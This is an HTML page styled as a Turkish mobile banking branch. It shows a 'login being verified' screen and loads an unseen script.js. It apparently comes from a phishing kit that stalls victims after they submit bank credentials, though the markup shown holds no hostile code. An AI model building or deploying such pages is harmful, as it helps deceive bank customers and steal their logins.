
<!DOCTYPE html>
<html lang="tr">

<head>
    <meta charset="UTF-8">
    <title>Mobil Şube</title>
    <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no" />
    <meta name="google" content="notranslate" />
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-QWTKZyjpPEjISv5WaRU9OFeRpok6YctnYmDr5pNlyT2bRjXh0JMhjY6hW+ALEwIH" crossorigin="anonymous">
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-YvpcrYf0tY3lHB60NNkmXc5s9fDVZLESaAA55NDzOxhy9GkcIdslK1eN7N6jIeHz" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
    <link rel="stylesheet" href="./style.css">
    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script>
    <style>
        .tab_head {
            display: flex;
        }

        .tab_head_title {
            width: 100%;
            text-align: center;
            border: 0;
            color: #9d9d9d;
            border-bottom: 2px solid #d0d1d6;
        }

        .tab_head_title.active {
            color: #1ca288;
            border-bottom: 2px solid #1ca288;
        }

        .tab_head_title span {
            font-size: 14px;
            font-weight: 600;
            padding: 10px 0;
            display: block;
        }

        .tab_body_content {
            display: none;
        }

        .tab_body_content.active {
            display: block;
        }   html { 
   margin: 0 auto;
   max-width: 420px;
      }@import url(https://fonts.googleapis.com/css2?family=Montserrat:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&display=swap);

div div h4 {
  font-family: Montserrat;
  font-weight: 500;
  font-style: normal
  
}
    </style>
</head>

<body>
    <div class="root"  style="max-width: 420px; margin: 0 auto;">
        <div class="header">
            <div class="d-flex justify-content-center">
                <img src="./logo.png" style="width:130px" alt="">
            </div>

        </div>
        <div class="tab_head">
            <div class="tab_head_title active" data-id="bireysel">
                <span>Giriş Doğrulanıyor</span>
            </div>
        </div>
        <div class="body">
            <div class="form">
                <div class="mb-2">
                    <img style="width:100px" src="./css/loading.gif" />
                </div>
                <h4 style="font-size:18px">Giriş bilgileriniz kontrol ediliyor.</h4>
                <h4 style="font-size:15px">Lütfen kısa bir süre sayfadan ayrılmayınız.</h4>
            </div>
        </div>
    </div>
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>

    <script src="script.js?v=1.1.2"></script>

  

</body>

</html>